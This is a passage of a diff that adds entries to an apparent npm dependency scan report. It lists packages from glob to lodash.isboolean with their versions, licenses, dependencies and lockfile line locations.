"1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "dunder-proto@1.0.1", + "es-object-atoms@1.1.1" + ], + "Locations": [ + { + "StartLine": 5811, + "EndLine": 5823 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "glob@10.5.0", + "Name": "glob", + "Identifier": { + "PURL": "pkg:npm/glob@10.5.0", + "UID": "51f02481b9ac79d9" + }, + "Version": "10.5.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "foreground-child@3.3.1", + "jackspeak@3.4.3", + "minimatch@9.0.9", + "minipass@7.1.3", + "package-json-from-dist@1.0.1", + "path-scurry@1.11.1" + ], + "Locations": [ + { + "StartLine": 6511, + "EndLine": 6531 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "glob-parent@5.1.2", + "Name": "glob-parent", + "Identifier": { + "PURL": "pkg:npm/glob-parent@5.1.2", + "UID": "f0da80437ab40507" + }, + "Version": "5.1.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-glob@4.0.3" + ], + "Locations": [ + { + "StartLine": 3996, + "EndLine": 4007 + }, + { + "StartLine": 5336, + "EndLine": 5347 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "glob-parent@6.0.2", + "Name": "glob-parent", + "Identifier": { + "PURL": "pkg:npm/glob-parent@6.0.2", + "UID": "d710a8fb4a823621" + }, + "Version": "6.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-glob@4.0.3" + ], + "Locations": [ + { + "StartLine": 5859, + "EndLine": 5870 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "google-auth-library@9.15.1", + "Name": "google-auth-library", + "Identifier": { + "PURL": "pkg:npm/google-auth-library@9.15.1", + "UID": "4c9e7d0805d070b7" + }, + "Version": "9.15.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "base64-js@1.5.1", + "ecdsa-sig-formatter@1.0.11", + "gaxios@6.7.1", + "gcp-metadata@6.1.1", + "gtoken@7.1.0", + "jws@4.0.1" + ], + "Locations": [ + { + "StartLine": 5887, + "EndLine": 5904 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "google-gax@4.6.1", + "Name": "google-gax", + "Identifier": { + "PURL": "pkg:npm/google-gax@4.6.1", + "UID": "f07ef8c106223e11" + }, + "Version": "4.6.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@grpc/grpc-js@1.14.3", + "@grpc/proto-loader@0.7.15", + "@types/long@4.0.2", + "abort-controller@3.0.0", + "duplexify@4.1.3", + "google-auth-library@9.15.1", + "node-fetch@2.7.0", + "object-hash@3.0.0", + "proto3-json-serializer@2.0.2", + "protobufjs@7.5.6", + "retry-request@7.0.2", + "uuid@9.0.1" + ], + "Locations": [ + { + "StartLine": 5905, + "EndLine": 5928 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "google-logging-utils@0.0.2", + "Name": "google-logging-utils", + "Identifier": { + "PURL": "pkg:npm/google-logging-utils@0.0.2", + "UID": "b9849dddd25ec441" + }, + "Version": "0.0.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5944, + "EndLine": 5953 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "gopd@1.2.0", + "Name": "gopd", + "Identifier": { + "PURL": "pkg:npm/gopd@1.2.0", + "UID": "698a11c181039168" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5954, + "EndLine": 5965 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "graceful-fs@4.2.11", + "Name": "graceful-fs", + "Identifier": { + "PURL": "pkg:npm/graceful-fs@4.2.11", + "UID": "da434b23993c8e0" + }, + "Version": "4.2.11", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5966, + "EndLine": 5971 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "gtoken@7.1.0", + "Name": "gtoken", + "Identifier": { + "PURL": "pkg:npm/gtoken@7.1.0", + "UID": "158369d345c14edd" + }, + "Version": "7.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "gaxios@6.7.1", + "jws@4.0.1" + ], + "Locations": [ + { + "StartLine": 5979, + "EndLine": 5992 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "has-symbols@1.1.0", + "Name": "has-symbols", + "Identifier": { + "PURL": "pkg:npm/has-symbols@1.1.0", + "UID": "bbb37362f5995752" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6003, + "EndLine": 6014 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "has-tostringtag@1.0.2", + "Name": "has-tostringtag", + "Identifier": { + "PURL": "pkg:npm/has-tostringtag@1.0.2", + "UID": "f044e50ba76299ff" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "has-symbols@1.1.0" + ], + "Locations": [ + { + "StartLine": 6015, + "EndLine": 6029 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "hasown@2.0.3", + "Name": "hasown", + "Identifier": { + "PURL": "pkg:npm/hasown@2.0.3", + "UID": "b902d17f2e19d092" + }, + "Version": "2.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "function-bind@1.1.2" + ], + "Locations": [ + { + "StartLine": 6030, + "EndLine": 6041 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "helmet@7.2.0", + "Name": "helmet", + "Identifier": { + "PURL": "pkg:npm/helmet@7.2.0", + "UID": "b57ef8d74bddd68" + }, + "Version": "7.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6042, + "EndLine": 6050 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "hsl-to-hex@1.0.0", + "Name": "hsl-to-hex", + "Identifier": { + "PURL": "pkg:npm/hsl-to-hex@1.0.0", + "UID": "da2be6266cacec4f" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "hsl-to-rgb-for-reals@1.1.1" + ], + "Locations": [ + { + "StartLine": 6051, + "EndLine": 6059 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "hsl-to-rgb-for-reals@1.1.1", + "Name": "hsl-to-rgb-for-reals", + "Identifier": { + "PURL": "pkg:npm/hsl-to-rgb-for-reals@1.1.1", + "UID": "40260101f741b38d" + }, + "Version": "1.1.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6060, + "EndLine": 6065 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "html-entities@2.6.0", + "Name": "html-entities", + "Identifier": { + "PURL": "pkg:npm/html-entities@2.6.0", + "UID": "d4f1310234c87f72" + }, + "Version": "2.6.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6066, + "EndLine": 6082 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "html-to-text@9.0.5", + "Name": "html-to-text", + "Identifier": { + "PURL": "pkg:npm/html-to-text@9.0.5", + "UID": "d1455c518f88c3d4" + }, + "Version": "9.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@selderee/plugin-htmlparser2@0.11.0", + "deepmerge@4.3.1", + "dom-serializer@2.0.0", + "htmlparser2@8.0.2", + "selderee@0.11.0" + ], + "Locations": [ + { + "StartLine": 6083, + "EndLine": 6098 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "htmlparser2@8.0.2", + "Name": "htmlparser2", + "Identifier": { + "PURL": "pkg:npm/htmlparser2@8.0.2", + "UID": "929954ad77733e6f" + }, + "Version": "8.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "domelementtype@2.3.0", + "domhandler@5.0.3", + "domutils@3.2.2", + "entities@4.5.0" + ], + "Locations": [ + { + "StartLine": 6099, + "EndLine": 6117 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "http-errors@2.0.1", + "Name": "http-errors", + "Identifier": { + "PURL": "pkg:npm/http-errors@2.0.1", + "UID": "5d6267d8daa5c905" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "depd@2.0.0", + "inherits@2.0.4", + "setprototypeof@1.2.0", + "statuses@2.0.2", + "toidentifier@1.0.1" + ], + "Locations": [ + { + "StartLine": 6118, + "EndLine": 6137 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "http-parser-js@0.5.10", + "Name": "http-parser-js", + "Identifier": { + "PURL": "pkg:npm/http-parser-js@0.5.10", + "UID": "bc7904be24d8a80b" + }, + "Version": "0.5.10", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6138, + "EndLine": 6143 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "http-proxy-agent@5.0.0", + "Name": "http-proxy-agent", + "Identifier": { + "PURL": "pkg:npm/http-proxy-agent@5.0.0", + "UID": "e94b9d1cfcd41abb" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@tootallnate/once@2.0.0", + "agent-base@6.0.2", + "debug@4.4.3" + ], + "Locations": [ + { + "StartLine": 6144, + "EndLine": 6158 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "https-proxy-agent@5.0.1", + "Name": "https-proxy-agent", + "Identifier": { + "PURL": "pkg:npm/https-proxy-agent@5.0.1", + "UID": "a74521fd76ce1bc6" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "agent-base@6.0.2", + "debug@4.4.3" + ], + "Locations": [ + { + "StartLine": 9565, + "EndLine": 9578 + }, + { + "StartLine": 10031, + "EndLine": 10043 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "https-proxy-agent@7.0.6", + "Name": "https-proxy-agent", + "Identifier": { + "PURL": "pkg:npm/https-proxy-agent@7.0.6", + "UID": "4db6d8bbe1c1c384" + }, + "Version": "7.0.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "agent-base@7.1.4", + "debug@4.4.3" + ], + "Locations": [ + { + "StartLine": 6172, + "EndLine": 6185 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "hyphen@1.14.1", + "Name": "hyphen", + "Identifier": { + "PURL": "pkg:npm/hyphen@1.14.1", + "UID": "629c3e393f280325" + }, + "Version": "1.14.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6196, + "EndLine": 6201 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "iconv-lite@0.4.24", + "Name": "iconv-lite", + "Identifier": { + "PURL": "pkg:npm/iconv-lite@0.4.24", + "UID": "b40a5eaa091755e7" + }, + "Version": "0.4.24", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "safer-buffer@2.1.2" + ], + "Locations": [ + { + "StartLine": 6202, + "EndLine": 6213 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "inherits@2.0.4", + "Name": "inherits", + "Identifier": { + "PURL": "pkg:npm/inherits@2.0.4", + "UID": "42acb560b77191d9" + }, + "Version": "2.0.4", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6263, + "EndLine": 6268 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ini@1.3.8", + "Name": "ini", + "Identifier": { + "PURL": "pkg:npm/ini@1.3.8", + "UID": "faf0ff41f7d40c12" + }, + "Version": "1.3.8", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6269, + "EndLine": 6274 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "internmap@2.0.3", + "Name": "internmap", + "Identifier": { + "PURL": "pkg:npm/internmap@2.0.3", + "UID": "7c69e1420aee960d" + }, + "Version": "2.0.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6275, + "EndLine": 6283 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ioredis@5.10.1", + "Name": "ioredis", + "Identifier": { + "PURL": "pkg:npm/ioredis@5.10.1", + "UID": "cbba7c0438dd0490" + }, + "Version": "5.10.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@ioredis/commands@1.5.1", + "cluster-key-slot@1.1.2", + "debug@4.4.3", + "denque@2.1.0", + "lodash.defaults@4.2.0", + "lodash.isarguments@3.1.0", + "redis-errors@1.2.0", + "redis-parser@3.0.0", + "standard-as-callback@2.1.0" + ], + "Locations": [ + { + "StartLine": 6284, + "EndLine": 6307 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ip-address@10.2.0", + "Name": "ip-address", + "Identifier": { + "PURL": "pkg:npm/ip-address@10.2.0", + "UID": "274c04694982a172" + }, + "Version": "10.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6308, + "EndLine": 6316 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ipaddr.js@1.9.1", + "Name": "ipaddr.js", + "Identifier": { + "PURL": "pkg:npm/ipaddr.js@1.9.1", + "UID": "39675c39452a1867" + }, + "Version": "1.9.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6317, + "EndLine": 6325 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-arrayish@0.3.4", + "Name": "is-arrayish", + "Identifier": { + "PURL": "pkg:npm/is-arrayish@0.3.4", + "UID": "e5037f6ef4f0bf3d" + }, + "Version": "0.3.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6326, + "EndLine": 6331 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-binary-path@2.1.0", + "Name": "is-binary-path", + "Identifier": { + "PURL": "pkg:npm/is-binary-path@2.1.0", + "UID": "2079e081bc2c9f55" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "binary-extensions@2.3.0" + ], + "Locations": [ + { + "StartLine": 6332, + "EndLine": 6343 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-core-module@2.16.1", + "Name": "is-core-module", + "Identifier": { + "PURL": "pkg:npm/is-core-module@2.16.1", + "UID": "194bb487a7d837d3" + }, + "Version": "2.16.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "hasown@2.0.3" + ], + "Locations": [ + { + "StartLine": 6344, + "EndLine": 6358 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-extglob@2.1.1", + "Name": "is-extglob", + "Identifier": { + "PURL": "pkg:npm/is-extglob@2.1.1", + "UID": "f7b62e701109bed3" + }, + "Version": "2.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6359, + "EndLine": 6367 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-fullwidth-code-point@3.0.0", + "Name": "is-fullwidth-code-point", + "Identifier": { + "PURL": "pkg:npm/is-fullwidth-code-point@3.0.0", + "UID": "b21f06b2855a0e40" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6368, + "EndLine": 6376 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-glob@4.0.3", + "Name": "is-glob", + "Identifier": { + "PURL": "pkg:npm/is-glob@4.0.3", + "UID": "bd4ded40b3143211" + }, + "Version": "4.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-extglob@2.1.1" + ], + "Locations": [ + { + "StartLine": 6377, + "EndLine": 6388 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-number@7.0.0", + "Name": "is-number", + "Identifier": { + "PURL": "pkg:npm/is-number@7.0.0", + "UID": "ff75f44ff8882f82" + }, + "Version": "7.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6389, + "EndLine": 6397 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-stream@2.0.1", + "Name": "is-stream", + "Identifier": { + "PURL": "pkg:npm/is-stream@2.0.1", + "UID": "11bf08ec7921745d" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6408, + "EndLine": 6420 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-url@1.2.4", + "Name": "is-url", + "Identifier": { + "PURL": "pkg:npm/is-url@1.2.4", + "UID": "fc8e05c4ae2d8462" + }, + "Version": "1.2.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6421, + "EndLine": 6426 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "isarray@1.0.0", + "Name": "isarray", + "Identifier": { + "PURL": "pkg:npm/isarray@1.0.0", + "UID": "9f6755f2db52c2e0" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6427, + "EndLine": 6432 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "isexe@2.0.0", + "Name": "isexe", + "Identifier": { + "PURL": "pkg:npm/isexe@2.0.0", + "UID": "ca59f4eac09e64d2" + }, + "Version": "2.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6433, + "EndLine": 6438 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jackspeak@3.4.3", + "Name": "jackspeak", + "Identifier": { + "PURL": "pkg:npm/jackspeak@3.4.3", + "UID": "5ead3b3accdc4793" + }, + "Version": "3.4.3", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@isaacs/cliui@8.0.2", + "@pkgjs/parseargs@0.11.0" + ], + "Locations": [ + { + "StartLine": 6439, + "EndLine": 6453 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jay-peg@1.1.1", + "Name": "jay-peg", + "Identifier": { + "PURL": "pkg:npm/jay-peg@1.1.1", + "UID": "1071af202f0b7732" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "restructure@3.0.2" + ], + "Locations": [ + { + "StartLine": 6454, + "EndLine": 6462 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jiti@1.21.7", + "Name": "jiti", + "Identifier": { + "PURL": "pkg:npm/jiti@1.21.7", + "UID": "a5e81f7303fe9af7" + }, + "Version": "1.21.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6463, + "EndLine": 6471 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jose@4.15.9", + "Name": "jose", + "Identifier": { + "PURL": "pkg:npm/jose@4.15.9", + "UID": "41aef2651f77b27e" + }, + "Version": "4.15.9", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6472, + "EndLine": 6480 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "js-beautify@1.15.4", + "Name": "js-beautify", + "Identifier": { + "PURL": "pkg:npm/js-beautify@1.15.4", + "UID": "bd071ff93589f502" + }, + "Version": "1.15.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "config-chain@1.1.13", + "editorconfig@1.0.7", + "glob@10.5.0", + "js-cookie@3.0.5", + "nopt@7.2.1" + ], + "Locations": [ + { + "StartLine": 6481, + "EndLine": 6501 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "js-cookie@3.0.5", + "Name": "js-cookie", + "Identifier": { + "PURL": "pkg:npm/js-cookie@3.0.5", + "UID": "c87934922ce49ae" + }, + "Version": "3.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6547, + "EndLine": 6555 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "js-md5@0.8.3", + "Name": "js-md5", + "Identifier": { + "PURL": "pkg:npm/js-md5@0.8.3", + "UID": "ddc387a2fb963626" + }, + "Version": "0.8.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6556, + "EndLine": 6561 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "js-tokens@4.0.0", + "Name": "js-tokens", + "Identifier": { + "PURL": "pkg:npm/js-tokens@4.0.0", + "UID": "ca817ce88dc3dc01" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6562, + "EndLine": 6567 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "json-bigint@1.0.0", + "Name": "json-bigint", + "Identifier": { + "PURL": "pkg:npm/json-bigint@1.0.0", + "UID": "c449dec1ac10502f" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bignumber.js@9.3.1" + ], + "Locations": [ + { + "StartLine": 6581, + "EndLine": 6590 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jsonwebtoken@9.0.3", + "Name": "jsonwebtoken", + "Identifier": { + "PURL": "pkg:npm/jsonwebtoken@9.0.3", + "UID": "6b1e2e8917a2bc0a" + }, + "Version": "9.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "jws@4.0.1", + "lodash.includes@4.3.0", + "lodash.isboolean@3.0.3", + "lodash.isinteger@4.0.4", + "lodash.isnumber@3.0.3", + "lodash.isplainobject@4.0.6", + "lodash.isstring@4.0.1", + "lodash.once@4.1.1", + "ms@2.1.3", + "semver@7.7.4" + ], + "Locations": [ + { + "StartLine": 6612, + "EndLine": 6633 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jwa@2.0.1", + "Name": "jwa", + "Identifier": { + "PURL": "pkg:npm/jwa@2.0.1", + "UID": "f72d9abf5d3b3bfe" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "buffer-equal-constant-time@1.0.1", + "ecdsa-sig-formatter@1.0.11", + "safe-buffer@5.2.1" + ], + "Locations": [ + { + "StartLine": 6634, + "EndLine": 6644 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jwks-rsa@3.2.2", + "Name": "jwks-rsa", + "Identifier": { + "PURL": "pkg:npm/jwks-rsa@3.2.2", + "UID": "fe89c313d7459e0" + }, + "Version": "3.2.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/jsonwebtoken@9.0.10", + "debug@4.4.3", + "jose@4.15.9", + "limiter@1.1.5", + "lru-memoizer@2.3.0" + ], + "Locations": [ + { + "StartLine": 6645, + "EndLine": 6660 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jws@4.0.1", + "Name": "jws", + "Identifier": { + "PURL": "pkg:npm/jws@4.0.1", + "UID": "538793c6a4f1bd07" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "jwa@2.0.1", + "safe-buffer@5.2.1" + ], + "Locations": [ + { + "StartLine": 6661, + "EndLine": 6670 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "leac@0.6.0", + "Name": "leac", + "Identifier": { + "PURL": "pkg:npm/leac@0.6.0", + "UID": "5426522bacdc68c3" + }, + "Version": "0.6.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6681, + "EndLine": 6689 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lilconfig@3.1.3", + "Name": "lilconfig", + "Identifier": { + "PURL": "pkg:npm/lilconfig@3.1.3", + "UID": "2d00c145ded3a50c" + }, + "Version": "3.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6704, + "EndLine": 6715 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "limiter@1.1.5", + "Name": "limiter", + "Identifier": { + "PURL": "pkg:npm/limiter@1.1.5", + "UID": "e4c47347752a8939" + }, + "Version": "1.1.5", + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6716, + "EndLine": 6720 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "linebreak@1.1.0", + "Name": "linebreak", + "Identifier": { + "PURL": "pkg:npm/linebreak@1.1.0", + "UID": "4c907302ba1c3120" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "base64-js@0.0.8", + "unicode-trie@2.0.0" + ], + "Locations": [ + { + "StartLine": 6721, + "EndLine": 6730 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lines-and-columns@1.2.4", + "Name": "lines-and-columns", + "Identifier": { + "PURL": "pkg:npm/lines-and-columns@1.2.4", + "UID": "c4ebb84e64c5f63f" + }, + "Version": "1.2.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6740, + "EndLine": 6745 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "locate-path@5.0.0", + "Name": "locate-path", + "Identifier": { + "PURL": "pkg:npm/locate-path@5.0.0", + "UID": "9e45ca045a15f4eb" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "p-locate@4.1.0" + ], + "Locations": [ + { + "StartLine": 8194, + "EndLine": 8205 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lodash@4.18.1", + "Name": "lodash", + "Identifier": { + "PURL": "pkg:npm/lodash@4.18.1", + "UID": "5ba8b9617005b61d" + }, + "Version": "4.18.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6779, + "EndLine": 6784 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lodash.camelcase@4.3.0", + "Name": "lodash.camelcase", + "Identifier": { + "PURL": "pkg:npm/lodash.camelcase@4.3.0", + "UID": "fcc3409cbce306ac" + }, + "Version": "4.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6785, + "EndLine": 6791 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lodash.clonedeep@4.5.0", + "Name": "lodash.clonedeep", + "Identifier": { + "PURL": "pkg:npm/lodash.clonedeep@4.5.0", + "UID": "e4993c005a08cc9e" + }, + "Version": "4.5.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6792, + "EndLine": 6797 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lodash.defaults@4.2.0", + "Name": "lodash.defaults", + "Identifier": { + "PURL": "pkg:npm/lodash.defaults@4.2.0", + "UID": "d24e54ccdb89d722" + }, + "Version": "4.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6798, + "EndLine": 6803 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lodash.includes@4.3.0", + "Name": "lodash.includes", + "Identifier": { + "PURL": "pkg:npm/lodash.includes@4.3.0", + "UID": "96768791d1e454ad" + }, + "Version": "4.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6804, + "EndLine": 6809 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lodash.isarguments@3.1.0", + "Name": "lodash.isarguments", + "Identifier": { + "PURL": "pkg:npm/lodash.isarguments@3.1.0", + "UID": "48c95730b09be74b" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6810, + "EndLine": 6815 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lodash.isboolean@3.0.3", + "Name": "lodash.isboolean", + "Identifier": { + "PURL": "pkg:npm/lodash.isboolean@3.0.3", + "UID": "efc8b0ca9afecf5f" + }, + 